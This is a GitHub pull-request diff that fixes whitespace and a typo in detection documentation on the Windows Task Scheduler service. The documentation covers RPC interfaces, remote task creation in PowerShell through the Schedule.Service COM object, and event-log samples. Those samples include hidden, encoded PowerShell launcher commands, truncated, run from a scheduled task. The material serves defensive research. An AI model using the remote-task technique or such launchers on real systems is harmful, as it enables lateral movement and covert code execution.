Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

minor spelling and trailing space update #72

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

minor spelling and trailing space update #72

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
238 changes: 119 additions & 119 deletions docs/library/windows/task_scheduler_service.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -27,16 +27,16 @@ Offset : 510656
ServiceName : Schedule
ServiceDisplayName : Task Scheduler
IsServiceRunning : True
Endpoints : {[86d35949-83c9-4044-b424-db363231fd0c, 1.0] ncalrpc:[LRPC-4803de23b17986468a], [86d35949-83c9-4044-b424-db363231fd0c, 1.0] ncalrpc:[ubpmtaskhostchannel],
Endpoints : {[86d35949-83c9-4044-b424-db363231fd0c, 1.0] ncalrpc:[LRPC-4803de23b17986468a], [86d35949-83c9-4044-b424-db363231fd0c, 1.0] ncalrpc:[ubpmtaskhostchannel],
[86d35949-83c9-4044-b424-db363231fd0c, 1.0] ncalrpc:[LRPC-83a142d94b8e74a91a]}
EndpointCount : 3
Client : False
Client : False
```

### RPC Clients
* taskcomp.dll
* taskschd.dll
* wmicmiplugin.dll
* wmicmiplugin.dll

### RPC Methods

Expand Down Expand Up @@ -65,8 +65,8 @@ ComplexTypes : {Struct_0, Struct_1, Struct_2}
FilePath : C:\Windows\System32\taskcomp.dll
Name : taskcomp.dll
Offset : 322256
ServiceName :
ServiceDisplayName :
ServiceName :
ServiceDisplayName :
IsServiceRunning : False
Endpoints : {[1ff70682-0a51-30e8-076d-740be8cee98b, 1.0] ncalrpc:[LRPC-b858137bbb082a0e8d]}
EndpointCount : 1
Expand Down Expand Up @@ -104,7 +104,7 @@ Client : False

## Interact with Task Scheduler Remotely

### Powershell - Schedule.Service COM Object
### Powershell - Schedule.Service COM Object
```Powershell
# connect to Task Scheduler:
$service = New-Object -ComObject Schedule.Service
Expand Down Expand Up @@ -145,43 +145,43 @@ $NewTask.stop(0)
* EventID 4702 (Target): A Scheduled Task Was updated

```xml
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}" />
<EventID>4702</EventID>
<Version>1</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2020-12-16T17:12:22.000309100Z" />
<EventRecordID>2292968</EventRecordID>
<Correlation ActivityID="{262c1204-cb81-0000-0dbf-29867cced601}" />
<Execution ProcessID="740" ThreadID="1560" />
<Channel>Security</Channel>
<Computer>WORKSTATION6.theshire.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3786818125-2382361537-3207726629-1104</Data>
<Data Name="SubjectUserName">pgustavo</Data>
<Data Name="SubjectDomainName">THESHIRE</Data>
<Data Name="SubjectLogonId">0x9ac216f</Data>
<Data Name="TaskName">\Ward0g</Data>
<Data Name="TaskContentNew"><?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Date>2020-12-16T08:09:21.4521839</Date> <Author>THESHIRE\sbeavers</Author> <Description>Que pasa</Description> <URI>\Ward0g</URI> </RegistrationInfo> <Triggers> <RegistrationTrigger> <Enabled>true</Enabled> </RegistrationTrigger> </Triggers> <Principals> <Principal id="Author"> <UserId>S-1-5-21-3786818125-2382361537-3207726629-1106</UserId> <LogonType>InteractiveToken</LogonType> <RunLevel>LeastPrivilege</RunLevel> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec> <Command>powershell</Command> <Arguments>-noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBpAE8ATgBUAGEAQgBMAGUALgBQAFMAVgBlAHIAUwBwAt.....</Data>
<Data Name="ClientProcessStartKey">0</Data>
<Data Name="ClientProcessId">0</Data>
<Data Name="ParentProcessId">0</Data>
<Data Name="RpcCallClientLocality">0</Data>
<Data Name="FQDN">WORKSTATION6.theshire.local</Data>
</EventData>
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}" />
<EventID>4702</EventID>
<Version>1</Version>
<Level>0</Level>
<Task>12804</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2020-12-16T17:12:22.000309100Z" />
<EventRecordID>2292968</EventRecordID>
<Correlation ActivityID="{262c1204-cb81-0000-0dbf-29867cced601}" />
<Execution ProcessID="740" ThreadID="1560" />
<Channel>Security</Channel>
<Computer>WORKSTATION6.theshire.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3786818125-2382361537-3207726629-1104</Data>
<Data Name="SubjectUserName">pgustavo</Data>
<Data Name="SubjectDomainName">THESHIRE</Data>
<Data Name="SubjectLogonId">0x9ac216f</Data>
<Data Name="TaskName">\Ward0g</Data>
<Data Name="TaskContentNew"><?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Date>2020-12-16T08:09:21.4521839</Date> <Author>THESHIRE\sbeavers</Author> <Description>Que pasa</Description> <URI>\Ward0g</URI> </RegistrationInfo> <Triggers> <RegistrationTrigger> <Enabled>true</Enabled> </RegistrationTrigger> </Triggers> <Principals> <Principal id="Author"> <UserId>S-1-5-21-3786818125-2382361537-3207726629-1106</UserId> <LogonType>InteractiveToken</LogonType> <RunLevel>LeastPrivilege</RunLevel> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>false</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>PT72H</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context="Author"> <Exec> <Command>powershell</Command> <Arguments>-noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBpAE8ATgBUAGEAQgBMAGUALgBQAFMAVgBlAHIAUwBwAt.....</Data>
<Data Name="ClientProcessStartKey">0</Data>
<Data Name="ClientProcessId">0</Data>
<Data Name="ParentProcessId">0</Data>
<Data Name="RpcCallClientLocality">0</Data>
<Data Name="FQDN">WORKSTATION6.theshire.local</Data>
</EventData>
</Event>
```

* EventID 4688 (Target): A New Process Has been created

### Microsoft-Windows-TaskScheduler/Operational Logs
* EventID 140: Task Rergistration Updated
* EventID 140: Task Registration Updated
* EventID 100: Task Started
* EventID 201: Action Completed
* EventID 201: Task Completed
Expand All @@ -193,94 +193,94 @@ $NewTask.stop(0)
* EventID 1: ProcessCreate (When Task is stopped)

```xml
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" />
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2020-12-16T17:23:48.196270400Z" />
<EventRecordID>9090341</EventRecordID>
<Correlation />
<Execution ProcessID="3256" ThreadID="4036" />
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>WORKSTATION6.theshire.local</Computer>
<Security UserID="S-1-5-18" />
</System>
- <EventData>
<Data Name="RuleName">-</Data>
<Data Name="UtcTime">2020-12-16 17:23:48.185</Data>
<Data Name="ProcessGuid">{649442b8-42a4-5fda-af62-000000000600}</Data>
<Data Name="ProcessId">2836</Data>
<Data Name="Image">C:\Windows\System32\taskhostw.exe</Data>
<Data Name="FileVersion">10.0.18362.1237 (WinBuild.160101.0800)</Data>
<Data Name="Description">Host Process for Windows Tasks</Data>
<Data Name="Product">Microsoft® Windows® Operating System</Data>
<Data Name="Company">Microsoft Corporation</Data>
<Data Name="OriginalFileName">taskhostw.exe</Data>
<Data Name="CommandLine">taskhostw.exe C:\windows\System32\WindowsPowerShell\v1.0\powershell.EXE -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBpAE8ATgBUAGEAQgBMAGUALgBQAFMAVgBlAHIAUwBpAE8AbgAuAE0AYQBqAE8AcgAgAC0AZwBFACAAMwApAHsAJAA4...</Data>
<Data Name="CurrentDirectory">C:\windows\system32\</Data>
<Data Name="User">THESHIRE\sbeavers</Data>
<Data Name="LogonGuid">{649442b8-783d-5fd2-c316-e00000000000}</Data>
<Data Name="LogonId">0xe016c3</Data>
<Data Name="TerminalSessionId">2</Data>
<Data Name="IntegrityLevel">Medium</Data>
<Data Name="Hashes">SHA1=6630F5E1A1ACC1C8E95A7958542DD87D0735D99B,MD5=52071D9553A92A12F22DDDF6DB6F9643,SHA256=ABCA3394728697205DEAD7C9B7B9076CDD28BEE84E7A3C84514478BC033E531A,IMPHASH=9CB27CAED52CB0AFFB32788922A0D083</Data>
<Data Name="ParentProcessGuid">{649442b8-52dc-5fd1-3600-000000000600}</Data>
<Data Name="ParentProcessId">2220</Data>
<Data Name="ParentImage">C:\Windows\System32\svchost.exe</Data>
<Data Name="ParentCommandLine">C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule</Data>
</EventData>
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" />
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2020-12-16T17:23:48.196270400Z" />
<EventRecordID>9090341</EventRecordID>
<Correlation />
<Execution ProcessID="3256" ThreadID="4036" />
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>WORKSTATION6.theshire.local</Computer>
<Security UserID="S-1-5-18" />
</System>
- <EventData>
<Data Name="RuleName">-</Data>
<Data Name="UtcTime">2020-12-16 17:23:48.185</Data>
<Data Name="ProcessGuid">{649442b8-42a4-5fda-af62-000000000600}</Data>
<Data Name="ProcessId">2836</Data>
<Data Name="Image">C:\Windows\System32\taskhostw.exe</Data>
<Data Name="FileVersion">10.0.18362.1237 (WinBuild.160101.0800)</Data>
<Data Name="Description">Host Process for Windows Tasks</Data>
<Data Name="Product">Microsoft® Windows® Operating System</Data>
<Data Name="Company">Microsoft Corporation</Data>
<Data Name="OriginalFileName">taskhostw.exe</Data>
<Data Name="CommandLine">taskhostw.exe C:\windows\System32\WindowsPowerShell\v1.0\powershell.EXE -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBpAE8ATgBUAGEAQgBMAGUALgBQAFMAVgBlAHIAUwBpAE8AbgAuAE0AYQBqAE8AcgAgAC0AZwBFACAAMwApAHsAJAA4...</Data>
<Data Name="CurrentDirectory">C:\windows\system32\</Data>
<Data Name="User">THESHIRE\sbeavers</Data>
<Data Name="LogonGuid">{649442b8-783d-5fd2-c316-e00000000000}</Data>
<Data Name="LogonId">0xe016c3</Data>
<Data Name="TerminalSessionId">2</Data>
<Data Name="IntegrityLevel">Medium</Data>
<Data Name="Hashes">SHA1=6630F5E1A1ACC1C8E95A7958542DD87D0735D99B,MD5=52071D9553A92A12F22DDDF6DB6F9643,SHA256=ABCA3394728697205DEAD7C9B7B9076CDD28BEE84E7A3C84514478BC033E531A,IMPHASH=9CB27CAED52CB0AFFB32788922A0D083</Data>
<Data Name="ParentProcessGuid">{649442b8-52dc-5fd1-3600-000000000600}</Data>
<Data Name="ParentProcessId">2220</Data>
<Data Name="ParentImage">C:\Windows\System32\svchost.exe</Data>
<Data Name="ParentCommandLine">C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule</Data>
</EventData>
</Event>
```

* EventID 1: ProcessCreate (Execution when task is forced to execute or task is updated)

```xml
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" />
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2020-12-16T17:40:06.014964400Z" />
<EventRecordID>9103725</EventRecordID>
<Correlation />
<Execution ProcessID="3256" ThreadID="4036" />
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>WORKSTATION6.theshire.local</Computer>
<Security UserID="S-1-5-18" />
</System>
- <EventData>
<Data Name="RuleName">-</Data>
<Data Name="UtcTime">2020-12-16 17:40:05.997</Data>
<Data Name="ProcessGuid">{649442b8-4675-5fda-d962-000000000600}</Data>
<Data Name="ProcessId">6840</Data>
<Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name="FileVersion">10.0.18362.1 (WinBuild.160101.0800)</Data>
<Data Name="Description">Windows PowerShell</Data>
<Data Name="Product">Microsoft® Windows® Operating System</Data>
<Data Name="Company">Microsoft Corporation</Data>
<Data Name="OriginalFileName">PowerShell.EXE</Data>
<Data Name="CommandLine">C:\windows\System32\WindowsPowerShell\v1.0\powershell.EXE -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBpAE8ATgBUAGEAQgBMAGUALgBQAFMAVgBlAHIAUwBpAE8AbgAuAE0AYQBqAE8AcgAgAC0AZwBFACAAMwAp...</Data>
<Data Name="CurrentDirectory">C:\windows\system32\</Data>
<Data Name="User">THESHIRE\sbeavers</Data>
<Data Name="LogonGuid">{649442b8-783d-5fd2-c316-e00000000000}</Data>
<Data Name="LogonId">0xe016c3</Data>
<Data Name="TerminalSessionId">2</Data>
<Data Name="IntegrityLevel">Medium</Data>
<Data Name="Hashes">SHA1=36C5D12033B2EAF251BAE61C00690FFB17FDDC87,MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481</Data>
<Data Name="ParentProcessGuid">{649442b8-52dc-5fd1-3600-000000000600}</Data>
<Data Name="ParentProcessId">2220</Data>
<Data Name="ParentImage">C:\Windows\System32\svchost.exe</Data>
<Data Name="ParentCommandLine">C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule</Data>
</EventData>
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" />
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2020-12-16T17:40:06.014964400Z" />
<EventRecordID>9103725</EventRecordID>
<Correlation />
<Execution ProcessID="3256" ThreadID="4036" />
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>WORKSTATION6.theshire.local</Computer>
<Security UserID="S-1-5-18" />
</System>
- <EventData>
<Data Name="RuleName">-</Data>
<Data Name="UtcTime">2020-12-16 17:40:05.997</Data>
<Data Name="ProcessGuid">{649442b8-4675-5fda-d962-000000000600}</Data>
<Data Name="ProcessId">6840</Data>
<Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name="FileVersion">10.0.18362.1 (WinBuild.160101.0800)</Data>
<Data Name="Description">Windows PowerShell</Data>
<Data Name="Product">Microsoft® Windows® Operating System</Data>
<Data Name="Company">Microsoft Corporation</Data>
<Data Name="OriginalFileName">PowerShell.EXE</Data>
<Data Name="CommandLine">C:\windows\System32\WindowsPowerShell\v1.0\powershell.EXE -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAUwBpAE8ATgBUAGEAQgBMAGUALgBQAFMAVgBlAHIAUwBpAE8AbgAuAE0AYQBqAE8AcgAgAC0AZwBFACAAMwAp...</Data>
<Data Name="CurrentDirectory">C:\windows\system32\</Data>
<Data Name="User">THESHIRE\sbeavers</Data>
<Data Name="LogonGuid">{649442b8-783d-5fd2-c316-e00000000000}</Data>
<Data Name="LogonId">0xe016c3</Data>
<Data Name="TerminalSessionId">2</Data>
<Data Name="IntegrityLevel">Medium</Data>
<Data Name="Hashes">SHA1=36C5D12033B2EAF251BAE61C00690FFB17FDDC87,MD5=CDA48FC75952AD12D99E526D0B6BF70A,SHA256=908B64B1971A979C7E3E8CE4621945CBA84854CB98D76367B791A6E22B5F6D53,IMPHASH=A7CEFACDDA74B13CD330390769752481</Data>
<Data Name="ParentProcessGuid">{649442b8-52dc-5fd1-3600-000000000600}</Data>
<Data Name="ParentProcessId">2220</Data>
<Data Name="ParentImage">C:\Windows\System32\svchost.exe</Data>
<Data Name="ParentCommandLine">C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule</Data>
</EventData>
</Event>
```

Expand Down